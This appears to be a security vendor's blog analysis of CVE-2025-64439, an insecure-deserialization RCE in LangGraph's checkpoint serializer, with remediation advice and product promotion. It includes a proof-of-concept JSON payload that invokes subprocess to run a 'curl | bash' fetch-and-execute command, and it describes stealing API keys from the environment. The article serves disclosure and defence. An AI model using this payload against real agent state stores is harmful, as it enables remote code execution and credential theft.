A technical analysis of CVE-2025-64439 (CVSS 9.8), a critical RCE in LangGraph's checkpoint serializer. We examine the JSON deserialization logic flaw, the kill chain for poisoning an AI agent's memory, and AI-driven defense strategies.

In the architectural shift of 2026, agentic AI has moved from experimental Jupyter notebooks into mission-critical enterprise infrastructure. Frameworks such as LangGraph have become the backbone of these systems, letting developers build stateful, multi-actor applications that can pause, resume, and iterate on complex tasks.

However, the disclosure of CVE-2025-64439 (CVSS score 9.8, Critical) exposes a catastrophic vulnerability in the very mechanism that gives these agents their "intelligence": their long-term memory.



This is not a typical web vulnerability. It is a supply-chain "nuclear option" aimed at the AI persistence layer. The flaw lives in the `langgraph-checkpoint` library, specifically in how `JsonPlusSerializer` handles data recovery. By exploiting it, attackers can inject malicious JSON payloads into the agent's state store (e.g., SQLite, Postgres), which triggers remote code execution (RCE) the moment the system tries to "remember" a previous state in order to resume a workflow.

For the hardcore AI security engineer, the implications are clear: "state" is the new "input". If an attacker can influence an agent's serialized history, they can run arbitrary code on the inference server. This article dissects the source code to expose the mechanics of this "memory poisoning" kill chain.

Vulnerability Intelligence Card

| Metric | Intelligence details |
|---|---|
| CVE ID | CVE-2025-64439 |
| Target component | langgraph-checkpoint (core library) & langgraph-checkpoint-sqlite |
| Affected versions | langgraph-checkpoint < 3.0.0; langgraph-checkpoint-sqlite <= 2.1.2 |
| Vulnerability type | Insecure deserialization (CWE-502) leading to RCE |
| CVSS v3.1 score | 9.8 (Critical) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Attack vector | Poisoning of the checkpoint database; man-in-the-middle on state transfer |

Technical Deep Dive: The JsonPlusSerializer Trap

To understand CVE-2025-64439, you need to understand how LangGraph handles persistence. Unlike a stateless LLM call, an agent must save its stack (variable values, conversation history, and execution steps) so that it can resume later. This is handled by checkpointers.



LangGraph tries to use msgpack for efficiency. However, because Python objects in AI workflows are often complex (custom classes, Pydantic models), it implements a robust fallback mechanism: JSON mode, handled by `JsonPlusSerializer`.

1. The Fatal "Constructor" Logic

The vulnerability is not in the use of JSON itself, but in how LangGraph extends JSON to support complex Python types. To reconstruct a Python object from JSON, the serializer looks for a specific schema containing "magic keys":

- `lc`: the LangChain/LangGraph version identifier (e.g., 2).
- `type`: the object type (specifically the string "constructor").
- `id`: a list representing the module path to the class or function.
- `kwargs`: the arguments to pass to that callable.

The flaw: in affected versions, the deserializer trusts `id` implicitly. It does not verify whether the specified module is a "safe" LangGraph component or a dangerous system library. It dynamically imports the module and calls the constructor with the supplied arguments.
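To make the schema concrete, here is a minimal sketch of what recognizing such an envelope could look like. The helper names (`is_constructor_envelope`, `describe_target`) are hypothetical and are not part of LangGraph; the example only inspects the dictionary and never imports or calls the target.

```python
from typing import Any


def is_constructor_envelope(value: Any) -> bool:
    """Return True if `value` has the shape of a constructor envelope."""
    return (
        isinstance(value, dict)
        and isinstance(value.get("lc"), int)
        and value.get("type") == "constructor"
        and isinstance(value.get("id"), list)
        and len(value["id"]) >= 2
        and all(isinstance(part, str) for part in value["id"])
        and isinstance(value.get("kwargs", {}), dict)
    )


def describe_target(value: dict) -> str:
    """Return the dotted name the envelope refers to, without importing it."""
    return ".".join(value["id"])


# A benign envelope: it names datetime.timedelta and passes hours=1.
benign = {
    "lc": 2,
    "type": "constructor",
    "id": ["datetime", "timedelta"],
    "kwargs": {"hours": 1},
}
```

The point of the sketch is that nothing in the envelope's shape distinguishes a harmless target from a dangerous one; only the contents of `id` do.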

2. Forensic Code Reconstruction

Based on analysis of the patch, the vulnerable logic in langgraph/checkpoint/serde/jsonplus.py resembles the following pattern:

```python
import importlib


# Simplified vulnerable logic (a reconstruction of the pattern, not the exact source)
def _load_constructor(value):
    # DANGEROUS: no allowlist check on 'id'
    # 'id' comes straight from the JSON payload
    module_path = value["id"][:-1]
    class_name = value["id"][-1]

    # Dynamically import any module
    module = importlib.import_module(".".join(module_path))
    cls = getattr(module, class_name)
    # Execute the constructor
    return cls(**value["kwargs"])
```

This logic turns the deserializer into a general-purpose "gadget chain" executor, much like the notorious Java `ObjectInputStream` vulnerabilities, but easier to exploit because the payload is human-readable JSON.
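For contrast, the missing check can be sketched as follows. This is an illustration of the allowlist idea under stated assumptions, not the code shipped in the patched library: `ALLOWED_CONSTRUCTORS`, `DisallowedConstructor`, and `load_constructor_checked` are hypothetical names, and the two allowed entries are arbitrary standard-library examples.

```python
import importlib
from typing import Any

# Hypothetical allowlist: only these (module, attribute) pairs may be constructed.
ALLOWED_CONSTRUCTORS = {
    ("datetime", "timedelta"),
    ("decimal", "Decimal"),
}


class DisallowedConstructor(ValueError):
    """Raised when an envelope names a target outside the allowlist."""


def load_constructor_checked(value: dict) -> Any:
    *module_parts, attr_name = value["id"]
    key = (".".join(module_parts), attr_name)
    # Check BEFORE importing: importing a module can itself run code.
    if key not in ALLOWED_CONSTRUCTORS:
        raise DisallowedConstructor(f"refusing to construct {key[0]}.{key[1]}")
    module = importlib.import_module(key[0])
    target = getattr(module, attr_name)
    return target(**value.get("kwargs", {}))
```

With this check in place, an envelope naming `subprocess.check_output` is rejected before any import happens, while an envelope naming `datetime.timedelta` is still reconstructed.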

The Kill Chain: Memory Poisoning

How does an attacker actually get this JSON into the system? The attack surface is wider than it appears.

Stage 1: Injection (The Poison)

The attacker needs to write to the database where checkpoints are stored.

- Scenario A (direct input): if the agent accepts user input that is stored raw in state (e.g., "Summarize this text: [MALICIOUS_JSON]") and the application's serialization logic is flawed, the payload may be written to the database.

- Scenario B (SQL injection pivot): an attacker uses a lower-severity SQL injection (such as CVE-2025-8709) to modify the `checkpoints` table in SQLite/Postgres directly, inserting the RCE payload into `thread_ts` or the state blob.

Stage 2: Weaponization (The Payload)

The attacker constructs a JSON payload that mimics a valid LangGraph object but points at `subprocess`.

Concept PoC payload:

```json
{
  "lc": 2,
  "type": "constructor",
  "id": ["subprocess", "check_output"],
  "kwargs": {
    "args": ["/bin/bash", "-c", "curl | bash"],
    "shell": false,
    "text": true
  }
}
```

Stage 3: Detonation (The Resume)

The code is not executed at the moment of injection. It is executed when the agent reads the state.

- The user (or the attacker) triggers the agent to resume the thread (e.g., "Continue previous task").
- LangGraph queries the database for the latest checkpoint.
- `JsonPlusSerializer` parses the blob.
- It encounters the `constructor` type.
- It imports `subprocess` and runs `check_output`.
- RCE is achieved.
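The gap between write time and read time can be illustrated with a harmless simulation. This is a sketch under stated assumptions: the table schema is a simplified stand-in (the real checkpoint tables differ), `naive_load` is a hypothetical stand-in for the vulnerable pattern, and the stored envelope names the benign `datetime.timedelta` rather than anything dangerous.

```python
import importlib
import json
import sqlite3


def naive_load(value):
    """Stand-in for the vulnerable pattern: constructs whatever 'id' names."""
    if isinstance(value, dict) and value.get("type") == "constructor":
        *module_parts, name = value["id"]
        target = getattr(importlib.import_module(".".join(module_parts)), name)
        return target(**value["kwargs"])
    return value


conn = sqlite3.connect(":memory:")
# Hypothetical, simplified schema; the real checkpoint tables differ.
conn.execute("CREATE TABLE checkpoints (thread_id TEXT, blob TEXT)")

# Write path: the envelope is stored as inert text. Nothing executes here.
marker = {
    "lc": 2,
    "type": "constructor",
    "id": ["datetime", "timedelta"],
    "kwargs": {"hours": 1},
}
conn.execute("INSERT INTO checkpoints VALUES (?, ?)", ("t1", json.dumps(marker)))

# Read path (the "resume"): the blob is parsed and the constructor runs.
(blob,) = conn.execute(
    "SELECT blob FROM checkpoints WHERE thread_id = ?", ("t1",)
).fetchone()
restored = naive_load(json.loads(blob))
print(type(restored).__name__, restored.total_seconds())  # prints: timedelta 3600.0
```

The insert succeeds silently and only the later read constructs an object, which is why a test that watches the write request alone sees nothing unusual.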

Impact Analysis: Stealing the AI's Brain

Compromising a server that runs LangGraph is significantly more dangerous than compromising an ordinary web server, because of the nature of AI workloads.

- Credential harvesting: AI agents rely on environment variables for API keys (`OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `AWS_ACCESS_KEY`). RCE grants immediate access to `os.environ`.

- Vector database exfiltration: agents often have read/write access to Pinecone, Milvus, or Weaviate. An attacker can dump proprietary knowledge bases (RAG data).

- Model weight poisoning: if the server hosts local models (e.g., via Ollama), attackers can poison the model weights or alter the inference pipeline.

- Lateral movement: LangGraph agents are designed to do things: call APIs, query databases, send email. The attacker inherits every permission and tool assigned to the agent.

AI-Driven Defense: The Penligent Advantage

Detecting CVE-2025-64439 is a nightmare for traditional DAST (Dynamic Application Security Testing) tools.

- Protocol blindness: scanners look for HTML forms and URL parameters. They do not understand the internal binary or JSON serialization protocols used by Python AI frameworks.

- State blindness: the vulnerability is triggered by a read, not a write. A scanner may inject a payload and see no immediate error, producing a false negative.

This is where Penligent.ai represents a paradigm shift in AI application security. Penligent uses deep dependency analysis and logic fuzzing:

- Full-stack AI fingerprinting

Penligent's agents go beyond `pip freeze`. They scan development and production containers to identify the exact hash versions of langgraph, langchain-core, and langgraph-checkpoint. They detect the vulnerable dependency chain even when it is nested deep inside a Docker image, and flag the presence of `JsonPlusSerializer` without allowlists.

- Serialization protocol fuzzing

Penligent understands the "language of agents". It can generate test-specific payloads containing serialization markers (such as lc=2 and benign constructor calls).

- Non-destructive testing: instead of a reverse shell, Penligent injects a payload that triggers an innocuous DNS lookup (e.g., via `socket.gethostbyname`).
- Verification: if Penligent's OOB listener receives the DNS query when the agent's state is loaded, the vulnerability is confirmed.

- State store auditing

Penligent connects to the persistence layer (SQLite/Postgres) used by your AI agents. It scans the stored blobs for "dormant payloads", malicious JSON structures waiting to be deserialized, and lets you sanitize your database before an incident occurs.

Remediation and Hardening Guide

If you are building with LangGraph, immediate remediation is required.

1. Upgrade dependencies (the fix)

Upgrade langgraph-checkpoint to version 3.0.0 or later immediately.

- Mechanism: the new version removes default support for the `constructor` type in JSON deserialization, or enforces a strict allowlist that is empty by default. This forces developers to explicitly register the classes that are safe to deserialize.
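A quick way to check an environment against the version bounds listed in this article is sketched below. It assumes plain `X.Y.Z` version strings (pre-release tags such as `rc1` are ignored by this simple parser), and the helper names are illustrative. `importlib.metadata` is part of the standard library from Python 3.8 onward.

```python
from importlib import metadata

# Bounds taken from the "Affected versions" row in this article.
RULES = {
    "langgraph-checkpoint": ("<", (3, 0, 0)),
    "langgraph-checkpoint-sqlite": ("<=", (2, 1, 2)),
}


def parse_version(text: str) -> tuple:
    """Parse a plain 'X.Y.Z' string into a 3-tuple of ints (pre-release tags ignored)."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(package: str, installed: str) -> bool:
    """Compare an installed version string against the bound for `package`."""
    op, bound = RULES[package]
    version = parse_version(installed)
    return version < bound if op == "<" else version <= bound


def check_environment() -> dict:
    """Map each tracked package to True (affected), False (not affected), or None (not installed)."""
    report = {}
    for package in RULES:
        try:
            report[package] = is_vulnerable(package, metadata.version(package))
        except metadata.PackageNotFoundError:
            report[package] = None
    return report
```

Calling `check_environment()` inside the agent's virtual environment or container gives a per-package verdict; a `True` entry means the installed version falls inside the affected range.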

2. Forensic database sanitization

If you suspect your system was exposed, you cannot simply patch the code; you must also clean the data.

- Action: write a tool that iterates over the `checkpoints` table and parses every JSON blob.
- Signature: look for `{"type": "constructor", "id": ["subprocess", ...]}` or any `id` pointing at `os`, `sys`, or `shutil`.
- Purge: delete any thread/checkpoint containing these signatures.
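The scanning step above can be sketched as follows. The function names are hypothetical, and the sketch works on `(row_key, blob_text)` pairs so that it does not assume any particular table layout; how the rows are fetched depends on the checkpointer in use. A denylist is used only because it mirrors the signature described above; flagging every module root that is not on an allowlist would be stricter.

```python
import json
from typing import Any, Iterator

# Module roots named in the signature above; extend as needed.
SUSPICIOUS_ROOTS = {"subprocess", "os", "sys", "shutil"}


def find_constructor_ids(node: Any) -> Iterator[list]:
    """Yield the 'id' list of every constructor envelope nested anywhere in `node`."""
    if isinstance(node, dict):
        if node.get("type") == "constructor" and isinstance(node.get("id"), list):
            yield node["id"]
        for child in node.values():
            yield from find_constructor_ids(child)
    elif isinstance(node, list):
        for child in node:
            yield from find_constructor_ids(child)


def is_suspicious(blob: str) -> bool:
    """Return True if the JSON text holds an envelope whose module root is suspicious."""
    try:
        doc = json.loads(blob)
    except (TypeError, ValueError):
        return False  # not JSON (e.g. msgpack); out of scope for this sketch
    return any(
        ids and str(ids[0]).split(".")[0] in SUSPICIOUS_ROOTS
        for ids in find_constructor_ids(doc)
    )


def scan_rows(rows) -> list:
    """rows: iterable of (row_key, blob_text). Returns the keys of rows to quarantine."""
    return [key for key, blob in rows if is_suspicious(blob)]
```

Quarantining flagged rows for review before deleting them preserves evidence for incident response.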

3. Network and runtime isolation

- Egress filtering: AI agents should not have unrestricted internet access. Block outbound connections to unknown IP addresses to prevent reverse shells.

- Database isolation: ensure the SQLite file or Postgres instance that stores checkpoints is not reachable through public interfaces.

- Least privilege: run the agent service as a user without shell access (`/bin/false`) and with tightly scoped IAM roles.

Conclusion

CVE-2025-64439 serves as a wake-up call for the AI industry. We are building systems that are increasingly autonomous, yet we are building them on a fragile foundation of trust. An agent's memory is a mutable surface that can be weaponized.

As we move toward systems approaching AGI, security engineering must evolve. We must treat "state" with the same suspicion we apply to "user input". Validating deserialization logic, auditing dependencies, and using AI-specific security tools such as Penligent are no longer optional; they are prerequisites for survival in the era of agentic AI.